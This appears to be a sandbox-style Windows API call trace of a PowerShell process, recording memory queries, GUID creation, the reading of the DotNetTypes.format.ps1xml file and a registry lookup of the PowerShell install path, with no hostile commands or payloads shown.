	[0316.740] VirtualQuery (in: lpAddress=0x28bb90, lpBuffer=0x28ca50, dwLength=0x30 | out: lpBuffer=0x28ca50*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0316.741] VirtualQuery (in: lpAddress=0x28bb90, lpBuffer=0x28ca50, dwLength=0x30 | out: lpBuffer=0x28ca50*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0316.742] CoCreateGuid (in: pguid=0x28d170 | out: pguid=0x28d170*(Data1=0xedb45930, Data2=0xbb3b, Data3=0x4e47, Data4=([0]=0xbc, [1]=0x1e, [2]=0x72, [3]=0xf8, [4]=0x48, [5]=0xf5, [6]=0x55, [7]=0xef))) returned 0x0
	[0316.745] CoCreateGuid (in: pguid=0x28d170 | out: pguid=0x28d170*(Data1=0x31e70356, Data2=0x2411, Data3=0x425f, Data4=([0]=0x9b, [1]=0x22, [2]=0xa4, [3]=0x30, [4]=0xe, [5]=0x4a, [6]=0xc4, [7]=0x13))) returned 0x0
	[0316.745] VirtualQuery (in: lpAddress=0x28bde0, lpBuffer=0x28cca0, dwLength=0x30 | out: lpBuffer=0x28cca0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0316.746] VirtualQuery (in: lpAddress=0x28bb20, lpBuffer=0x28c9e0, dwLength=0x30 | out: lpBuffer=0x28c9e0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0316.746] VirtualQuery (in: lpAddress=0x28bb20, lpBuffer=0x28c9e0, dwLength=0x30 | out: lpBuffer=0x28c9e0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0316.747] CoCreateGuid (in: pguid=0x28d170 | out: pguid=0x28d170*(Data1=0xfeaced8c, Data2=0x2165, Data3=0x474e, Data4=([0]=0x8f, [1]=0x7c, [2]=0x24, [3]=0x68, [4]=0x47, [5]=0x66, [6]=0x6f, [7]=0x5c))) returned 0x0
	[0316.747] VirtualQuery (in: lpAddress=0x28bde0, lpBuffer=0x28cca0, dwLength=0x30 | out: lpBuffer=0x28cca0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0316.747] VirtualQuery (in: lpAddress=0x28bc00, lpBuffer=0x28cac0, dwLength=0x30 | out: lpBuffer=0x28cac0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0316.748] VirtualQuery (in: lpAddress=0x28b450, lpBuffer=0x28c310, dwLength=0x30 | out: lpBuffer=0x28c310*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0316.748] VirtualQuery (in: lpAddress=0x28b450, lpBuffer=0x28c310, dwLength=0x30 | out: lpBuffer=0x28c310*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0316.748] CoCreateGuid (in: pguid=0x28d170 | out: pguid=0x28d170*(Data1=0xaa85eb09, Data2=0x554f, Data3=0x457e, Data4=([0]=0x8b, [1]=0xb8, [2]=0x1a, [3]=0xfa, [4]=0x1c, [5]=0x39, [6]=0x4b, [7]=0x5c))) returned 0x0
	[0316.748] CoCreateGuid (in: pguid=0x28d170 | out: pguid=0x28d170*(Data1=0x69bd180b, Data2=0xa3c3, Data3=0x419e, Data4=([0]=0xa0, [1]=0xf3, [2]=0x53, [3]=0xc6, [4]=0x52, [5]=0xbe, [6]=0xb1, [7]=0xd3))) returned 0x0
	[0316.748] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28c930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0316.749] SetErrorMode (uMode=0x1) returned 0x1
	[0316.749] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x308
	[0316.749] GetFileType (hFile=0x308) returned 0x1
	[0316.749] SetErrorMode (uMode=0x1) returned 0x1
	[0316.749] GetFileType (hFile=0x308) returned 0x1
	[0316.749] ReadFile (in: hFile=0x308, lpBuffer=0x332edd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x332edd0*, lpNumberOfBytesRead=0x28ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0316.750] ReadFile (in: hFile=0x308, lpBuffer=0x332edd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x332edd0*, lpNumberOfBytesRead=0x28ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0316.750] ReadFile (in: hFile=0x308, lpBuffer=0x332edd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x332edd0*, lpNumberOfBytesRead=0x28ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0316.751] ReadFile (in: hFile=0x308, lpBuffer=0x332edd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x332edd0*, lpNumberOfBytesRead=0x28ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0316.751] ReadFile (in: hFile=0x308, lpBuffer=0x332edd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x332edd0*, lpNumberOfBytesRead=0x28ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0316.751] ReadFile (in: hFile=0x308, lpBuffer=0x332edd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x332edd0*, lpNumberOfBytesRead=0x28ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0316.752] ReadFile (in: hFile=0x308, lpBuffer=0x332edd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x332edd0*, lpNumberOfBytesRead=0x28ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0316.752] ReadFile (in: hFile=0x308, lpBuffer=0x332edd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x332edd0*, lpNumberOfBytesRead=0x28ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0316.752] ReadFile (in: hFile=0x308, lpBuffer=0x332edd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x332edd0*, lpNumberOfBytesRead=0x28ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0316.753] ReadFile (in: hFile=0x308, lpBuffer=0x332edd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x332edd0*, lpNumberOfBytesRead=0x28ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0316.753] ReadFile (in: hFile=0x308, lpBuffer=0x332edd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x332edd0*, lpNumberOfBytesRead=0x28ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0316.753] ReadFile (in: hFile=0x308, lpBuffer=0x332edd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x332edd0*, lpNumberOfBytesRead=0x28ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0316.753] ReadFile (in: hFile=0x308, lpBuffer=0x332edd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x332edd0*, lpNumberOfBytesRead=0x28ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0316.754] ReadFile (in: hFile=0x308, lpBuffer=0x332edd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x332edd0*, lpNumberOfBytesRead=0x28ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0316.754] ReadFile (in: hFile=0x308, lpBuffer=0x332edd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x332edd0*, lpNumberOfBytesRead=0x28ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0316.754] ReadFile (in: hFile=0x308, lpBuffer=0x332edd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x332edd0*, lpNumberOfBytesRead=0x28ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0316.755] ReadFile (in: hFile=0x308, lpBuffer=0x332edd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x332edd0*, lpNumberOfBytesRead=0x28ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0316.755] ReadFile (in: hFile=0x308, lpBuffer=0x332edd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x332edd0*, lpNumberOfBytesRead=0x28ceb8*=0xbce, lpOverlapped=0x0) returned 1
	[0316.756] ReadFile (in: hFile=0x308, lpBuffer=0x332e506, nNumberOfBytesToRead=0x32, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x332e506*, lpNumberOfBytesRead=0x28ceb8*=0x0, lpOverlapped=0x0) returned 1
	[0316.756] ReadFile (in: hFile=0x308, lpBuffer=0x332edd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x332edd0*, lpNumberOfBytesRead=0x28ceb8*=0x0, lpOverlapped=0x0) returned 1
	[0316.756] CloseHandle (hObject=0x308) returned 1
	[0316.756] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28cc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0316.756] SetErrorMode (uMode=0x1) returned 0x1
	[0316.756] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x28ce60 | out: lpFileInformation=0x28ce60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1
	[0316.756] SetErrorMode (uMode=0x1) returned 0x1
	[0316.756] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28cb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0316.757] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x28cf48 | out: phkResult=0x28cf48*=0x308) returned 0x0
	[0316.757] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x28cecc, lpData=0x0, lpcbData=0x28cec8*=0x0 | out: lpType=0x28cecc*=0x1, lpData=0x0, lpcbData=0x28cec8*=0x56) returned 0x0
	[0316.757] CoTaskMemAlloc (cb=0x5a) returned 0x149930
	[0316.757] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x28ce9c, lpData=0x149930, lpcbData=0x28ce98*=0x56 | out: lpType=0x28ce9c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x28ce98*=0x56) returned 0x0
	[0316.757] CoTaskMemFree (pv=0x149930) 
	[0316.757] RegCloseKey (hKey=0x308) returned 0x0
	[0316.757] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28cb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0316.757] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28ca40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0317.058] CoCreateGuid (in: pguid=0x28d170 | out: pguid=0x28d170*(Data1=0xb54c5ca5, Data2=0xe617, Data3=0x43d7, Data4=([0]=0xa8, [1]=0x29, [2]=0x29, [3]=0x33, [4]=0x6d, [5]=0x9f, [6]=0xe1, [7]=0x22))) returned 0x0
	[0317.059] CoCreateGuid (in: pguid=0x28d170 | out: pguid=0x28d170*(Data1=0xe7035cdc, Data2=0x273a, Data3=0x4ee5, Data4=([0]=0xba, [1]=0x69, [2]=0xc, [3]=0x4c, [4]=0xb1, [5]=0xca, [6]=0xd3, [7]=0xa4))) returned 0x0
	[0317.059] CoCreateGuid (in: pguid=0x28d170 | out: pguid=0x28d170*(Data1=0x8a963179, Data2=0xdcab, Data3=0x45a3, Data4=([0]=0x94, [1]=0xb4, [2]=0x8b, [3]=0xee, [4]=0xe7, [5]=0x32, [6]=0xed, [7]=0x65))) returned 0x0
	[0317.059] CoCreateGuid (in: pguid=0x28d170 | out: pguid=0x28d170*(Data1=0xb476a628, Data2=0x498b, Data3=0x44ad, Data4=([0]=0x8d, [1]=0x62, [2]=0x45, [3]=0x2f, [4]=0x89, [5]=0xd3, [6]=0xc1, [7]=0x28))) returned 0x0
	[0317.059] CoCreateGuid (in: pguid=0x28d170 | out: pguid=0x28d170*(Data1=0x14678ba6, Data2=0x9b39, Data3=0x432d, Data4=([0]=0x90, [1]=0xfc, [2]=0x72, [3]=0x5b, [4]=0x6, [5]=0x3e, [6]=0xa3, [7]=0x45))) returned 0x0
	[0317.059] CoCreateGuid (in: pguid=0x28d170 | out: pguid=0x28d170*(Data1=0xa9c6abed, Data2=0x7a69, Data3=0x43a7, Data4=([0]=0xa7, [1]=0x82, [2]=0xba, [3]=0xcb, [4]=0x89, [5]=0x27, [6]=0x85, [7]=0x17))) returned 0x0
	[0317.060] VirtualQuery (in: lpAddress=0x28bb20, lpBuffer=0x28c9e0, dwLength=0x30 | out: lpBuffer=0x28c9e0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0317.060] CoCreateGuid (in: pguid=0x28d170 | out: pguid=0x28d170*(Data1=0xbeb6b899, Data2=0x4c80, Data3=0x4dd4, Data4=([0]=0x9b, [1]=0x1f, [2]=0xd, [3]=0xf0, [4]=0x69, [5]=0xa6, [6]=0x17, [7]=0xef))) returned 0x0
	[0317.060] VirtualQuery (in: lpAddress=0x28bb20, lpBuffer=0x28c9e0, dwLength=0x30 | out: lpBuffer=0x28c9e0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0317.060] VirtualQuery (in: lpAddress=0x28bb20, lpBuffer=0x28c9e0, dwLength=0x30 | out: lpBuffer=0x28c9e0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0317.060] CoCreateGuid (in: pguid=0x28d170 | out: pguid=0x28d170*(Data1=0x74968093, Data2=0x210d, Data3=0x4fa5, Data4=([0]=0xa2, [1]=0xd8, [2]=0xe, [3]=0x34, [4]=0x15, [5]=0x8e, [6]=0xc9, [7]=0xf5))) returned 0x0
	[0317.060] CoCreateGuid (in: pguid=0x28d170 | out: pguid=0x28d170*(Data1=0x57a1bf6a, Data2=0xbec2, Data3=0x4596, Data4=([0]=0xa0, [1]=0x61, [2]=0x5c, [3]=0x3d, [4]=0xe9, [5]=0x6e, [6]=0xaa, [7]=0x11))) returned 0x0
	[0317.060] CoCreateGuid (in: pguid=0x28d170 | out: pguid=0x28d170*(Data1=0x14bcb72c, Data2=0xfb7b, Data3=0x4d13, Data4=([0]=0xb3, [1]=0x41, [2]=0xe1, [3]=0x4, [4]=0xdb, [5]=0x25, [6]=0xf2, [7]=0xe6))) returned 0x0
	[0317.060] CoCreateGuid (in: pguid=0x28d170 | out: pguid=0x28d170*(Data1=0xcf938503, Data2=0x5df4, Data3=0x4606, Data4=([0]=0xb3, [1]=0x72, [2]=0x93, [3]=0xe6, [4]=0x42, [5]=0xf2, [6]=0xf6, [7]=0xd8))) returned 0x0
	[0317.061] VirtualQuery (in: lpAddress=0x28bb20, lpBuffer=0x28c9e0, dwLength=0x30 | out: lpBuffer=0x28c9e0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0317.061] CoCreateGuid (in: pguid=0x28d170 | out: pguid=0x28d170*(Data1=0x9e870915, Data2=0x595b, Data3=0x4f82, Data4=([0]=0xb5, [1]=0x4a, [2]=0x30, [3]=0x6e, [4]=0x45, [5]=0xb2, [6]=0x42, [7]=0x32))) returned 0x0
	[0317.061] VirtualQuery (in: lpAddress=0x28bb20, lpBuffer=0x28c9e0, dwLength=0x30 | out: lpBuffer=0x28c9e0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0317.061] VirtualQuery (in: lpAddress=0x28bb20, lpBuffer=0x28c9e0, dwLength=0x30 | out: lpBuffer=0x28c9e0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0317.061] VirtualQuery (in: lpAddress=0x28bb20, lpBuffer=0x28c9e0, dwLength=0x30 | out: lpBuffer=0x28c9e0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0317.061] VirtualQuery (in: lpAddress=0x28bb20, lpBuffer=0x28c9e0, dwLength=0x30 | out: lpBuffer=0x28c9e0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0317.061] VirtualQuery (in: lpAddress=0x28bb20, lpBuffer=0x28c9e0, dwLength=0x30 | out: lpBuffer=0x28c9e0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0317.061] CoCreateGuid (in: pguid=0x28d170 | out: pguid=0x28d170*(Data1=0x4ede23e1, Data2=0xd650, Data3=0x4f04, Data4=([0]=0x99, [1]=0xb4, [2]=0x11, [3]=0x6, [4]=0x1, [5]=0xed, [6]=0x85, [7]=0x50))) returned 0x0
	[0317.062] CoCreateGuid (in: pguid=0x28d170 | out: pguid=0x28d170*(Data1=0x798f13e4, Data2=0xbe40, Data3=0x4b27, Data4=([0]=0x8d, [1]=0x3f, [2]=0x27, [3]=0x48, [4]=0x7e, [5]=0xa1, [6]=0x8f, [7]=0xf8))) returned 0x0
	[0317.062] CoCreateGuid (in: pguid=0x28d170 | out: pguid=0x28d170*(Data1=0x683c3762, Data2=0x7eaf, Data3=0x4855, Data4=([0]=0xbe, [1]=0xef, [2]=0x2c, [3]=0x10, [4]=0xdd, [5]=0xd, [6]=0x2d, [7]=0xa8))) returned 0x0
	[0317.062] CoCreateGuid (in: pguid=0x28d170 | out: pguid=0x28d170*(Data1=0x9d77840e, Data2=0x4138, Data3=0x450e, Data4=([0]=0x84, [1]=0xda, [2]=0xe9, [3]=0xfe, [4]=0x6, [5]=0xe7, [6]=0x8f, [7]=0xec))) returned 0x0
	[0317.062] CoCreateGuid (in: pguid=0x28d170 | out: pguid=0x28d170*(Data1=0xb87bed10, Data2=0x920f, Data3=0x424e, Data4=([0]=0x90, [1]=0x67, [2]=0x6e, [3]=0x29, [4]=0xf, [5]=0x9c, [6]=0xb2, [7]=0x83))) returned 0x0
	[0317.062] VirtualQuery (in: lpAddress=0x28bde0, lpBuffer=0x28cca0, dwLength=0x30 | out: lpBuffer=0x28cca0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0317.062] CoCreateGuid (in: pguid=0x28d170 | out: pguid=0x28d170*(Data1=0xcf6fbac6, Data2=0xfac5, Data3=0x48ac, Data4=([0]=0xa8, [1]=0x8e, [2]=0xcd, [3]=0x14, [4]=0x1, [5]=0x6, [6]=0xe, [7]=0x9b))) returned 0x0
	[0317.063] CoCreateGuid (in: pguid=0x28d170 | out: pguid=0x28d170*(Data1=0x9898fcbc, Data2=0x3516, Data3=0x418d, Data4=([0]=0xa4, [1]=0x97, [2]=0x47, [3]=0x5d, [4]=0xcf, [5]=0x71, [6]=0x90, [7]=0xb3))) returned 0x0
	[0317.063] CoCreateGuid (in: pguid=0x28d170 | out: pguid=0x28d170*(Data1=0x65f0d334, Data2=0x73f, Data3=0x4c55, Data4=([0]=0x9d, [1]=0x27, [2]=0xed, [3]=0xd5, [4]=0xff, [5]=0xd5, [6]=0x47, [7]=0x70))) returned 0x0
	[0317.063] CoCreateGuid (in: pguid=0x28d170 | out: pguid=0x28d170*(Data1=0x23b4e41f, Data2=0x878f, Data3=0x4bf2, Data4=([0]=0xaf, [1]=0xcb, [2]=0xb9, [3]=0xf6, [4]=0x40, [5]=0xc0, [6]=0xcd, [7]=0x83))) returned 0x0
	[0317.063] CoCreateGuid (in: pguid=0x28d170 | out: pguid=0x28d170*(Data1=0xa277088, Data2=0x6a00, Data3=0x4048, Data4=([0]=0xb1, [1]=0xd4, [2]=0x87, [3]=0xd5, [4]=0x7e, [5]=0xbf, [6]=0x61, [7]=0xa8))) returned 0x0
	[0317.063] CoCreateGuid (in: pguid=0x28d170 | out: pguid=0x28d170*(Data1=0x6475bf0e, Data2=0xa48, Data3=0x43d3, Data4=([0]=0xaa, [1]=0x29, [2]=0x3c, [3]=0x7a, [4]=0x1a, [5]=0x7, [6]=0x5b, [7]=0xaf))) returned 0x0
	[0317.063] CoCreateGuid (in: pguid=0x28d170 | out: pguid=0x28d170*(Data1=0xd118ea30, Data2=0x9c8, Data3=0x4aa2, Data4=([0]=0x93, [1]=0xe4, [2]=0x60, [3]=0x4c, [4]=0xee, [5]=0x4a, [6]=0x4d, [7]=0x7a))) returned 0x0
	[0317.064] CoCreateGuid (in: pguid=0x28d170 | out: pguid=0x28d170*(Data1=0x451e82f5, Data2=0xcaee, Data3=0x4124, Data4=([0]=0xa8, [1]=0xeb, [2]=0xa4, [3]=0xd3, [4]=0x4f, [5]=0x11, [6]=0x1a, [7]=0xfb))) returned 0x0
	[0317.064] CoCreateGuid (in: pguid=0x28d170 | out: pguid=0x28d170*(Data1=0x941f516c, Data2=0xfabe, Data3=0x4870, Data4=([0]=0x9f, [1]=0x85, [2]=0xfc, [3]=0xcc, [4]=0xb2, [5]=0xa4, [6]=0xa9, [7]=0xa8))) returned 0x0
	[0317.064] CoCreateGuid (in: pguid=0x28d170 | out: pguid=0x28d170*(Data1=0x1a882977, Data2=0x6f8f, Data3=0x40c9, Data4=([0]=0xa3, [1]=0x17, [2]=0x8d, [3]=0xf0, [4]=0xb3, [5]=0x94, [6]=0xcc, [7]=0xaf))) returned 0x0
	[0317.064] CoCreateGuid (in: pguid=0x28d170 | out: pguid=0x28d170*(Data1=0xf23019aa, Data2=0x819, Data3=0x47c1, Data4=([0]=0xb8, [1]=0xf, [2]=0x97, [3]=0x62, [4]=0xd1, [5]=0x32, [6]=0x25, [7]=0xd7))) returned 0x0
	[0317.064] CoCreateGuid (in: pguid=0x28d170 | out: pguid=0x28d170*(Data1=0xe96fecfe, Data2=0x58f8, Data3=0x4989, Data4=([0]=0xa9, [1]=0x21, [2]=0xc6, [3]=0x38, [4]=0xd7, [5]=0xb0, [6]=0xe4, [7]=0x54))) returned 0x0
	[0317.064] CoCreateGuid (in: pguid=0x28d170 | out: pguid=0x28d170*(Data1=0x1652b993, Data2=0x7ad7, Data3=0x4d90, Data4=([0]=0x91, [1]=0x44, [2]=0xff, [3]=0x4b, [4]=0x4c, [5]=0xa0, [6]=0x46, [7]=0x64))) returned 0x0
	[0317.065] CoCreateGuid (in: pguid=0x28d170 | out: pguid=0x28d170*(Data1=0x2f480bbc, Data2=0xbb3c, Data3=0x4714, Data4=([0]=0x88, [1]=0x34, [2]=0x9d, [3]=0xf2, [4]=0x2e, [5]=0xb0, [6]=0xb0, [7]=0x8a))) returned 0x0
	[0317.065] CoCreateGuid (in: pguid=0x28d170 | out: pguid=0x28d170*(Data1=0xff1d7969, Data2=0x7ecb, Data3=0x4eaf, Data4=([0]=0x91, [1]=0x93, [2]=0x9d, [3]=0xa4, [4]=0x3e, [5]=0x9a, [6]=0x3b, [7]=0x8b))) returned 0x0
	[0317.065] CoCreateGuid (in: pguid=0x28d170 | out: pguid=0x28d170*(Data1=0x553759ec, Data2=0x7b21, Data3=0x43e4, Data4=([0]=0x85, [1]=0x38, [2]=0x2c, [3]=0x74, [4]=0x8c, [5]=0x8e, [6]=0xf6, [7]=0xe3))) returned 0x0
	[0317.065] CoCreateGuid (in: pguid=0x28d170 | out: pguid=0x28d170*(Data1=0x145a2d2e, Data2=0x875e, Data3=0x46c2, Data4=([0]=0xb4, [1]=0x48, [2]=0xc2, [3]=0x1f, [4]=0xa9, [5]=0x4e, [6]=0x26, [7]=0xf))) returned 0x0
	[0317.065] CoCreateGuid (in: pguid=0x28d170 | out: pguid=0x28d170*(Data1=0xa13701cf, Data2=0x686a, Data3=0x4992, Data4=([0]=0x97, [1]=0x6e, [2]=0x88, [3]=0x42, [4]=0x24, [5]=0x4d, [6]=0x6f, [7]=0xb2))) returned 0x0
	[0317.065] CoCreateGuid (in: pguid=0x28d170 | out: pguid=0x28d170*(Data1=0x775741eb, Data2=0x6cd8, Data3=0x4e98, Data4=([0]=0x92, [1]=0x73, [2]=0x17, [3]=0xb6, [4]=0xf5, [5]=0xbd, [6]=0xe1, [7]=0x6a))) returned 0x0
	[0317.066] VirtualQuery (in: lpAddress=0x28bb20, lpBuffer=0x28c9e0, dwLength=0x30 | out: lpBuffer=0x28c9e0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
